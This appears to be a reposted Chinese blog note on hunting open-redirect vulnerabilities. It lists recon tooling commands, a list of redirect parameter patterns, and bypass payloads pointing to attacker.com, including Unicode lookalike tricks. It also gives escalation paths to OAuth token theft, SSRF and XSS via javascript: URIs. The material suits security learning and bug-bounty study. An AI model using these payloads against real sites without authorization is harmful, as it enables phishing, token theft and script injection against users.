zoukankan      html  css  js  c++  java
  • url跳转挖掘

    https://0x00sec.org/t/open-redirection-guide/21118

    工具都是go语言的,不太会用,留个坑

    Identifing possible vulnerable endpoints:

    • waybackurls 10 + hakrawler 9 + gf 11

      1cat subdomains | waybackurls | tee -a urls
      2cat subdomains | hakrawler -depth 3 -plain | tee -a urls
      3gf redirect urls

      using redirect.json with gf:

    {
        "flags" : "-HanrE",
        "pattern" : "url=|rt=|cgi-bin/redirect.cgi|continue=|dest=|destination=|go=|out=|redir=|redirect_uri=|redirect_url=|return=|return_path=|returnTo=|rurl=|target=|view=|from_url=|load_url=|file_url=|page_url=|file_name=|page=|folder=|folder_url=|login_url=|img_url=|return_url=|return_to=|next=|redirect=|redirect_to=|logout=|checkout=|checkout_url=|goto=|next_page=|file=|load_file="
    }
    
    • Google dorks
      site:domain.com inurl:[PARAMETER] using a parameter list 21
    • Manual inspection by navigating the webapp and intercepting the requests

    Confirm and exploit:

    * https://company.com/?redirect=http://attacker.com
    * https://company.com/?redirect=http://company.com.attacker.com
    * https://company.com/?redirect=https://company.com@attacker.com
    * https://company.com/?redirect=//attacker.com
    * https://company.com/?redirect=http://attacker.com#company.com
    * https://company.com/?redirect=http://attacker.com?company.com
    * https://company.com/?redirect=http://attacker.com/company.com
    * https://company.com/?redirect=http://ⓐⓣⓣⓐⓒⓚⓔⓡ.ⓒⓞⓜ
    
    Using special characters:
    ① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ 
    ⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ 
    ⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛ 
    ⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵ 
    Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ 
    ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ 
    ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿ 。
    

    Special characters’ source 4

    Escalating to other vulnerabilities:

    Open Redirect + Miconfigured OAuth App => OAuth Token Stealing
    Open Redirect + Filtered SSRF => SSRF
    Open Redirect + CRLFi => XSS
    Open Redirect + javascript URI => XSS
    

    Source 4

    Escalate to XSS

    • https://company.com/?redirect=javascript:alert(1)
    • https://company.com/?redirect=javascript:prompt(1)

    Escalate to XSS using CRLFi

  • 相关阅读:
    Retrofit源码分析
    Android异步消息机制
    崩溃bug日志总结3
    单例模式
    总结(第一段)
    mysql日期类型比较
    mysql记录(一)
    JSONObject/JSONArray的区别
    java 正则表达式(Pattern ,Matcher)的使用
    javaweb开发中的权限管理的方法
  • 原文地址:https://www.cnblogs.com/ahacker15/p/13065571.html
Copyright © 2011-2022 走看看